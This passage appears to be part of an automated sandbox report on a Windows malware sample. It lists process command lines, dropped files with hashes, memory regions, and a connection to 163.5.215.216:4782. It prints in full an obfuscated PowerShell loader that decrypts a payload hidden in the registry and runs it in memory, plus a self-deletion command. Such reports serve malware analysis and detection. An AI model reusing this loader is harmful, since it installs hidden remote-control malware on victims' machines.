'')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{62105ef6-29fa-467e-b9a5-81419faa8537}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e7bc4198-1eea-4999-9025-1b21a802bc4a}
C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3140).WaitForExit();[System.Threading.Thread]::Sleep(5000); function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{e0c64e4a-e289-446b-9b62-aad49c20761f}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ab669555-1861-4cd5-bb82-f900b9024d77}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{8782712f-e10f-41c5-8d5c-e2d4b98f5c50}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{f340cd86-ca5c-45a4-bf7d-667d6f3d75af}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a80c228b-076e-4481-bbab-32b4da8f515b}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{31e4bd32-ecb1-447b-ba19-fb7c88d83439}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{ab2103d1-5466-41e7-b63d-5f2f340b56a3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{519bd706-2191-4464-9c0e-f597a8cfe5c9}
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1788 -ip 1788
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 480
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2bc96821-fb4e-4a02-b1d2-b9a3808fcc98}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 640 -p 5172 -ip 5172
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5172 -s 416
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{109c5d41-12cb-47d9-94d2-123258ce61c2}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{b5dcbc06-7a0e-4b61-98f3-555610136be3}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{61efd6de-ac99-456f-9f47-e74f02889d8a}
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 600 -p 3140 -ip 3140
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3140 -s 1096
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe" & exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\PING.EXE
PING localhost -n 8
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2fadd490-4a00-4232-a576-3ab452933281}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{780e673d-6db3-4954-ae44-c01d58bd29e4}
Network
| Country | Destination | Domain | Proto |
| FR | 163.5.215.216:4782 | tcp | |
| FR | 163.5.215.216:4782 | tcp |
Files
memory/1656-0-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp
memory/1656-1-0x000001F0D2ED0000-0x000001F0D308E000-memory.dmp
memory/1656-2-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-3-0x000001F0EE780000-0x000001F0EE860000-memory.dmp
memory/1656-4-0x000001F0EEA40000-0x000001F0EEBE6000-memory.dmp
memory/1656-5-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-6-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-15-0x000001E9C6DF0000-0x000001E9C6E12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bqhyqas2.ynr.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3112-16-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-17-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-18-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-19-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
| MD5 | 0e9ccd796e251916133392539572a374 |
| SHA1 | eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204 |
| SHA256 | c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221 |
| SHA512 | e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d |
memory/1656-32-0x00007FF8E4EC3000-0x00007FF8E4EC5000-memory.dmp
memory/1656-33-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/1656-34-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/3112-35-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/4644-36-0x000001F180000000-0x000001F180024000-memory.dmp
memory/3112-37-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/4644-39-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/4644-38-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3112-40-0x00007FF8E4EC0000-0x00007FF8E5982000-memory.dmp
memory/4644-41-0x000001F180330000-0x000001F180D80000-memory.dmp
memory/4644-43-0x000001F180D90000-0x000001F180E36000-memory.dmp
memory/4644-45-0x000001F180EA0000-0x000001F180EF8000-memory.dmp
memory/4644-44-0x000001F180E40000-0x000001F180E96000-memory.dmp
memory/4644-46-0x000001F180F00000-0x000001F180F22000-memory.dmp
memory/4644-49-0x000001F180FE0000-0x000001F180FEA000-memory.dmp
memory/4644-47-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/1980-51-0x0000000140000000-0x0000000140004000-memory.dmp
memory/1980-50-0x0000000140000000-0x0000000140004000-memory.dmp
memory/2700-52-0x0000000000400000-0x0000000000406000-memory.dmp
memory/2700-53-0x0000000000400000-0x0000000000406000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 356e04e106f6987a19938df67dea0b76 |
| SHA1 | f2fd7cde5f97427e497dfb07b7f682149dc896fb |
| SHA256 | 4ed8a115fa1dcfd532397b800775c1b54d2d407b52118b5423e94ff1ce855d7e |
| SHA512 | df1c655fa3a95e001084af8c3aa97c54dbcb690210e1353dd836702cfb4af3c857449df62aa62d7ab525ffb4e0dc1552181dfcdee2c28f4af5c20df6d95811cd |
C:\Windows\$sxr-cmd.exe
| MD5 | c5db7b712f280c3ae4f731ad7d5ea171 |
| SHA1 | e8717ff0d40e01fd3b06de2aa5a401bed1c907cc |
| SHA256 | f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba |
| SHA512 | bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89 |
memory/3140-75-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3140-76-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/3140-77-0x000001B278DE0000-0x000001B279364000-memory.dmp
memory/3140-78-0x000001B279760000-0x000001B279F2A000-memory.dmp
memory/3140-79-0x000001B279F30000-0x000001B27A36E000-memory.dmp
memory/3140-80-0x000001B27A370000-0x000001B27A422000-memory.dmp
memory/3140-81-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/3140-89-0x000001B27BAA0000-0x000001B27BAF0000-memory.dmp
memory/3140-90-0x000001B27BBB0000-0x000001B27BC62000-memory.dmp
memory/3140-91-0x000001B27BE40000-0x000001B27C002000-memory.dmp
memory/3140-100-0x000001B27BAF0000-0x000001B27BB2C000-memory.dmp
memory/3140-101-0x000001B27BA50000-0x000001B27BA9E000-memory.dmp
memory/3140-103-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/3140-104-0x000001B27BB30000-0x000001B27BB66000-memory.dmp
memory/3140-102-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/4716-105-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4716-106-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4716-108-0x00007FF8F3790000-0x00007FF8F384D000-memory.dmp
memory/4716-107-0x00007FF8F49E0000-0x00007FF8F4BE9000-memory.dmp
memory/2600-109-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-110-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-112-0x0000000000400000-0x0000000000420000-memory.dmp
memory/2600-114-0x0000000001730000-0x000000000174A000-memory.dmp
memory/640-119-0x0000028CDD830000-0x0000028CDD857000-memory.dmp
memory/468-123-0x000001D500590000-0x000001D5005B7000-memory.dmp
memory/692-128-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/996-131-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/420-138-0x000002B9B30C0000-0x000002B9B30E7000-memory.dmp
memory/1120-151-0x000001EFAA6F0000-0x000001EFAA717000-memory.dmp
memory/1096-148-0x000002906EE60000-0x000002906EE87000-memory.dmp
memory/1096-149-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/420-139-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/424-135-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/424-134-0x0000024D61C90000-0x0000024D61CB7000-memory.dmp
memory/996-130-0x0000012C24260000-0x0000012C24287000-memory.dmp
memory/468-125-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/640-124-0x00007FF8B4A70000-0x00007FF8B4A80000-memory.dmp
memory/692-121-0x00000149E4CE0000-0x00000149E4D07000-memory.dmp
memory/640-117-0x0000028CDD800000-0x0000028CDD822000-memory.dmp
memory/4716-115-0x0000000140000000-0x0000000140028000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.4dc3ac07-b339-43cc-901e-cb521eccfa3a.tmp.csv
| MD5 | 0dfe21816632d1f53f37eb791b02a24e |
| SHA1 | 0a1763d0752e0334fee2cd905aa230048e6a5113 |
| SHA256 | 964e2f3426ab175c933c9149d8fe4302f555d2d346b344ce19a0c53d6867bd1d |
| SHA512 | decdb66522217c5ca36fa6faceeb995df7ad056f4d409401cbb1cf38efc4ee0755162c2b7e884a64f9fa61d73638d77ed9021ca234b55bf061ae28e5db91555f |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.9ff30b4f-331b-4e0b-b799-a69fe5191378.tmp.txt
| MD5 | bb127983170b4affbd37e7c7c1d58f74 |
| SHA1 | 28cd2c40bedbad606c1c27e36194c655eaca71e0 |
| SHA256 | abc080af4d4156467aea3f74cbb8f0a2f32d45ff26973fcf8974555d714e92e2 |
| SHA512 | 73af4e872963c0e8c3cf906af707371e8a6c6ffa8fa79f182e1b5958b3ba5b019276dee629d511ea6d3430b18675ec17bf5a59c899490a12c46f9a0e840cf98c |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.ff54c4ef-f9ba-4dcf-831f-aed520c76a2f.tmp.csv
| MD5 | 2b4730b3193d16fb35ce5333c41054b0 |
| SHA1 | c8797e421c6baa8347007d495c8dd45fe722672a |
| SHA256 | 0b628a9b5530e085441ae850b04b11402a48926f6552c771d0c3eeb1a273c0ae |
